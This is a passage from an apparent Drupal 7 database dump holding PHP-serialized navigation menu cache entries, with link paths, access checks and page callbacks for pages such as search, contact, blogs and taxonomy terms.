2;}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:50:\"a:3:{i:0;s:18:\"taxonomy_form_term\";i:1;i:2;i:2;N;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:15:\"taxonomy/term/%\";s:8:\"tab_root\";s:15:\"taxonomy/term/%\";s:5:\"title\";s:4:\"Edit\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:88;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"navigation\";s:4:\"mlid\";s:2:\"88\";s:4:\"plid\";s:2:\"27\";s:9:\"link_path\";s:20:\"taxonomy/term/%/view\";s:11:\"router_path\";s:20:\"taxonomy/term/%/view\";s:10:\"link_title\";s:4:\"View\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:2:\"27\";s:2:\"p2\";s:2:\"88\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:36:\"a:1:{i:2;s:18:\"taxonomy_term_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:32:\"a:1:{i:0;s:14:\"access content\";}\";s:13:\"page_callback\";s:18:\"taxonomy_term_page\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:2;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:15:\"taxonomy/term/%\";s:8:\"tab_root\";s:15:\"taxonomy/term/%\";s:5:\"title\";s:4:\"View\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}i:187;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"navigation\";s:4:\"mlid\";s:3:\"187\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:6:\"search\";s:11:\"router_path\";s:6:\"search\";s:10:\"link_title\";s:6:\"Search\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:3:\"187\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:16:\"search_is_active\";s:16:\"access_arguments\";s:6:\"a:0:{}\";s:13:\"page_callback\";s:11:\"search_view\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:6:\"search\";s:5:\"title\";s:6:\"Search\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:2:\"20\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:399;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"navigation\";s:4:\"mlid\";s:3:\"399\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:7:\"contact\";s:11:\"router_path\";s:7:\"contact\";s:10:\"link_title\";s:7:\"Contact\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:3:\"399\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:47:\"a:1:{i:0;s:29:\"access site-wide contact form\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:35:\"a:1:{i:0;s:17:\"contact_site_form\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:7:\"contact\";s:5:\"title\";s:7:\"Contact\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:2:\"20\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:504;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"navigation\";s:4:\"mlid\";s:3:\"504\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:4:\"blog\";s:11:\"router_path\";s:4:\"blog\";s:10:\"link_title\";s:5:\"Blogs\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:3:\"504\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:32:\"a:1:{i:0;s:14:\"access content\";}\";s:13:\"page_callback\";s:14:\"blog_page_last\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:4:\"blog\";s:5:\"title\";s:5:\"Blogs\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:2:\"20\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}s:10:\"node_links\";a:0:{}}',0,1444995772,1),('links:navigation:tree-data:en:9bd1605e2280833450478f9083b7f8714c2fa28f1012455e2744e5af1a13eec5','a:2:{s:4:\"tree\";a:10:{i:3;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"navigation\";s:4:\"mlid\";s:1:\"3\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:9:\"comment/%\";s:11:\"router_path\";s:9:\"comment/%\";s:10:\"link_title\";s:17:\"Comment permalink\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"3\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:12:\"a:1:{i:1;N;}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:33:\"a:1:{i:0;s:15:\"access comments\";}\";s:13:\"page_callback\";s:17:\"comment_permalink\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:9:\"comment/%\";s:5:\"title\";s:17:\"Comment permalink\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:4;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"navigation\";s:4:\"mlid\";s:1:\"4\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:11:\"filter/tips\";s:11:\"router_path\";s:11:\"filter/tips\";s:10:\"link_title\";s:12:\"Compose tips\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"4\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:1:\"1\";s:16:\"access_arguments\";s:6:\"a:0:{}\";s:13:\"page_callback\";s:16:\"filter_tips_long\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:11:\"filter/tips\";s:5:\"title\";s:12:\"Compose tips\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:2:\"20\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:5;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"navigation\";s:4:\"mlid\";s:1:\"5\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:6:\"node/%\";s:11:\"router_path\";s:6:\"node/%\";s:10:\"link_title\";s:0:\"\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"5\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"node_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"node_access\";s:16:\"access_arguments\";s:29:\"a:2:{i:0;s:4:\"view\";i:1;i:1;}\";s:13:\"page_callback\";s:14:\"node_page_view\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:6:\"node/%\";s:5:\"title\";s:0:\"\";s:14:\"title_callback\";s:15:\"node_page_title\";s:15:\"title_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:6;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"navigation\";s:4:\"mlid\";s:1:\"6\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:8:\"node/add\";s:11:\"router_path\";s:8:\"node/add\";s:10:\"link_title\";s:11:\"Add content\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"6\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:16:\"_node_add_access\";s:16:\"access_arguments\";s:6:\"a:0:{}\";s:13:\"page_callback\";s:13:\"node_add_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:8:\"node/add\";s:5:\"title\";s:11:\"Add content\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:17;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"navigation\";s:4:\"mlid\";s:2:\"17\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:6:\"user/%\";s:11:\"router_path\";s:6:\"user/%\";s:10:\"link_title\";s:10:\"My account\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:2:\"17\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"user_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:16:\"user_view_access\";s:16:\"access_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:13:\"page_callback\";s:14:\"user_view_page\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:6:\"user/%\";s:5:\"title\";s:10:\"My account\";s:14:\"title_callback\";s:15:\"user_page_title\";s:15:\"title_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:23;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"navigation\";s:4:\"mlid\";s:2:\"23\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:15:\"comment/reply/%\";s:11:\"router_path\";s:15:\"comment/reply/%\";s:10:\"link_title\";s:15:\"Add new comment\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:2:\"23\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:26:\"a:1:{i:2;s:9:\"node_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"node_access\";s:16:\"access_arguments\";s:29:\"a:2:{i:0;s:4:\"view\";i:1;i:2;}\";s:13:\"page_callback\";s:13:\"comment_reply\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:2;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"comment/reply/%\";s:5:\"title\";s:15:\"Add new comment\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:27;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"navigation\";s:4:\"mlid\";s:2:\"27\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:15:\"taxonomy/term/%\";s:11:\"router_path\";s:15:\"taxonomy/term/%\";s:10:\"link_title\";s:13:\"Taxonomy term\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:2:\"27\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:36:\"a:1:{i:2;s:18:\"taxonomy_term_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:32:\"a:1:{i:0;s:14:\"access content\";}\";s:13:\"page_callback\";s:18:\"taxonomy_term_page\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:2;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"taxonomy/term/%\";s:5:\"title\";s:13:\"Taxonomy term\";s:14:\"title_callback\";s:19:\"taxonomy_term_title\";s:15:\"title_arguments\";s:14:\"a:1:{i:0;i:2;}\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:187;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"navigation\";s:4:\"mlid\";s:3:\"187\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:6:\"search\";s:11:\"router_path\";s:6:\"search\";s:10:\"link_title\";s:6:\"Search\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:3:\"187\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:16:\"search_is_active\";s:16:\"access_arguments\";s:6:\"a:0:{}\";s:13:\"page_callback\";s:11:\"search_view\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:6:\"search\";s:5:\"title\";s:6:\"Search\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:2:\"20\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:399;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"navigation\";s:4:\"mlid\";s:3:\"399\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:7:\"contact\";s:11:\"router_path\";s:7:\"contact\";s:10:\"link_title\";s:7:\"Contact\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:3:\"399\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:47:\"a:1:{i:0;s:29:\"access site-wide contact form\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:35:\"a:1:{i:0;s:17:\"contact_site_form\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:7:\"contact\";s:5:\"title\";s:7:\"Contact\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:2:\"20\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:504;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"navigation\";s:4:\"mlid\";s:3:\"504\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:4:\"blog\";s:11:\"router_path\";s:4:\"blog\";s:10:\"link_title\";s:5:\"Blogs\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:3:\"504\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:32:\"a:1:{i:0;s:14:\"access content\";}\";s:13:\"page_callback\";s:14:\"blog_page_last\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:4:\"blog\";s:5:\"title\";s:5:\"Blogs\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:2:\"20\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}s:10:\"node_links\";a:0:{}}',0,1444940208,1),('links:navigation:tree-data:en:a3962e11cb88333ee69c8ba3d957203cac9f0bc7e1d79c7e09c9826d9f935486','a:2:{s:4:\"tree\";a:10:{i:3;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"navigation\";s:4:\"mlid\";s:1:\"3\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:9:\"comment/%\";s:11:\"router_path\";s:9:\"comment/%\";s:10:\"link_title\";s:17:\"Comment permalink\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"3\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:12:\"a:1:{i:1;N;}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:33:\"a:1:{i:0;s:15:\"access comments\";}\";s:13:\"page_callback\";s:17:\"comment_permalink\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:9:\"comment/%\";s:5:\"title\";s:17:\"Comment permalink\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:4;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"navigation\";s:4:\"mlid\";s:1:\"4\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:11:\"filter/tips\";s:11:\"router_path\";s:11:\"filter/tips\";s:10:\"link_title\";s:12:\"Compose 